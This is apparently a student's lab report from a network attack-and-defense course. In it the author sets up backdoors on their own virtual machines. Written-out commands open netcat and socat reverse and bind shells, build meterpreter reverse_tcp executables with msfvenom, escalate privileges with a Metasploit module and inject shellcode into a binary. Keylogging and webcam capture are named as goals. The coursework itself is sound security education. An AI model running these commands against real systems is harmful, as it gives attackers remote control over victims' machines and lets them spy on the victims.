20202402 2022-2023-2 《网络与系统攻防技术》实验二实验报告

  1. 实验内容

1.1 实验要求

(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。

1.2实验原理

1.2.1 后门

后门就是攻击者在想要攻击的目的主机上留下的可以隐藏自己,获取目的主机的控制权或系统访问权的方法。

1.2.2 ncat

ncat是可以进行远程连接的,在Linux通常是自带的,可以使用man nc来查看nc的相关命令。

1.2.3 socat

socat可以当作是netcat的加强版,在两个数据流之间建立通道,且支持众多协议和链接方式,用于连接远程端口,获取shell。

1.2.4 Meterpreter

是一个用于生成后门程序的工具。

2.实验过程

2.1使用netcat获取主机操作Shell,cron启动某项任务

首先在kali和windows中通过指令获得ip地址,在windows中打开监听

ncat.exe -l -p 

在kali中输入

nc 192.168.11.19 5313 -e /bin/sh

与windows建立连接,如图获得kali的shell

修改时程表也可

2.2使用SOCAT获取主机操作SHELL, 任务计划启动

在Windows单击【计算机】—【管理】—【任务计划程序】下【任务计划程序库】,选择【创建任务】

在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5301 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5301,同时把cmd.exe的stderr重定向到stdout上:

到时间的时候会弹出窗口

在kali上通过socat与windows建立连接,可以使用windows的shell

2.3使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

在kali上生成可执行文件20202402backdoor.exe,注意使用kali的IP地址

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.35 LPORT=2402 -f exe > 20202402backdoor.exe

通过后门程序传到windows

然后kali中输入msfconsole后进行如下操作

use exploit/multi/handler 使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp 使用和生成后门程序时相同的payload
set LHOST 172.16.218.133 这里用的是LinuxIP,和生成后门程序时指定的IP相同
set LPORT 5322 同样要使用相同的端口.
exploit

运行windows上的后门程序,可以看到已经建立连接并可以使用windows的shell

2.4使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

在上一个实验的基础上继续操作

由于我的电脑摄像头本身就有问题,腾讯会议都用不了,所以这里不进行获取

在尝试提权的时候,直接进行getsystem会报错,在参考这篇文章https://xz.aliyun.com/t/6400以后,通过用exploit/windows/local/ask模块可以成功

2.5使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

输入

msfvenom -p linux/x86/meterpreter/reverse_tcp Lhost=192.168.3.35 LPORT=4444 -x ./pwn1 -f elf >  pwn20202402shellcode

再在msfconsole中,重复实验三的步骤,在另一个终端运行pwn20202402shellcode,便可成功调用shell

3.问题及解决方案

3.1实验三可执行文件问题

问题:

在实验三运行可执行文件以后,kali没有反应,在多次重复尝试以后仍然无法解决,快要崩溃了

解决方案:

重新设置虚拟机的网络连接方式,把NAT模式改为桥接模式

3.2提权

问题:

直接使用getsystem报错

解决方案:

https://xz.aliyun.com/t/6400,这篇写的很详细,不止有提权。

4.问题回答

4.1例举你能想到的一个后门进入到你系统中的可能方式?

像2345这样的恶心人软件或网站,可能在安装或访问时会有后门程序装入

4.2例举你知道的后门如何启动起来(win及linux)的方式?

win:开机自启

linux:cron启动

4.3Meterpreter有哪些给你映像深刻的功能?

在植入后门后,可以控制主机的执行指令,包括录音、录像、截图、键盘输入记录等

4.4如何发现自己有系统有没有被安装后门?

定时杀毒,安全扫描

5.实验感悟

这次实验完成也算成功,就是中间因为虚拟机配置问题差点发疯,以后再遇到此类问题应该减少无意义的重复试验,换个思路想问题。同时这次实验让我感到了后门的可怕,一个小小的程序就可能把我扒光到一丝不挂,再一次意识到网络安全的重要性,道阻且长,迎难而上。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值